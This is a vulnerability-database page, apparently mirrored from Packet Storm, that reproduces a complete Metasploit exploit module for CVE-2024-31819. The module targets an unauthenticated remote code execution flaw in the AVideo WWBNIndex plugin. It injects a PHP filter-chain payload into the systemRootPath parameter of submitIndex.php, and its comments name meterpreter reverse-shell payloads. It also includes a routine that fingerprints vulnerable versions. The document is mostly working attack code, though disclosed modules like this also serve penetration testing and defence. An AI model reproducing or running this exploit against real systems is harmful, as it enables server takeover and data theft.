Lucene search
K

AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution

🗓️ 22 May 2024 00:00:00Reported by Valentin Lobstein, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 438 Views

AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution vulnerability in submitIndex.php allows execution of arbitrary PHP code on server without authentication. Allows remote attackers to exploit vulnerability.

Related
Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HTTP::PhpFilterChain  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',  
'Description' => %q{  
This module exploits an unauthenticated remote code execution (RCE) vulnerability  
in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the  
`submitIndex.php` file, where user-supplied input is passed directly to the `require()`  
function without proper sanitization. By exploiting this, an attacker can leverage the  
PHP filter chaining technique to execute arbitrary PHP code on the server. This allows  
for the execution of commands and control over the affected system. The exploit is  
particularly dangerous because it does not require authentication, making it possible  
for any remote attacker to exploit this vulnerability.  
},  
'Author' => [  
'Valentin Lobstein'  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2024-31819'],  
['URL', 'https://github.com/WWBN/AVideo'],  
['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']  
],  
'Platform' => ['php', 'unix', 'linux', 'win'],  
'Arch' => [ARCH_PHP, ARCH_CMD],  
'Targets' => [  
[  
'PHP In-Memory',  
{  
'Platform' => 'php',  
'Arch' => ARCH_PHP  
# tested with php/meterpreter/reverse_tcp  
}  
],  
[  
'Unix In-Memory',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD  
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp  
}  
],  
[  
'Windows In-Memory',  
{  
'Platform' => 'win',  
'Arch' => ARCH_CMD  
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => '2024-04-09',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
},  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 443,  
'FETCH_WRITABLE_DIR' => '/tmp'  
}  
)  
)  
end  
  
def exploit  
php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"  
filter_payload = generate_php_filter_payload(php_code)  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),  
'ctype' => 'application/x-www-form-urlencoded',  
'data' => "systemRootPath=#{filter_payload}"  
)  
print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code  
end  
  
def check  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'index.php'),  
'method' => 'GET',  
'follow_redirect' => true  
})  
return CheckCode::Unknown('Failed to connect to the target.') unless res  
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200  
  
version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)  
return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]  
  
version = Rex::Version.new(version_match[1])  
plugin_check = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),  
'method' => 'GET'  
})  
unless plugin_check&.code == 200  
CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')  
end  
  
if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))  
return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")  
end  
  
CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation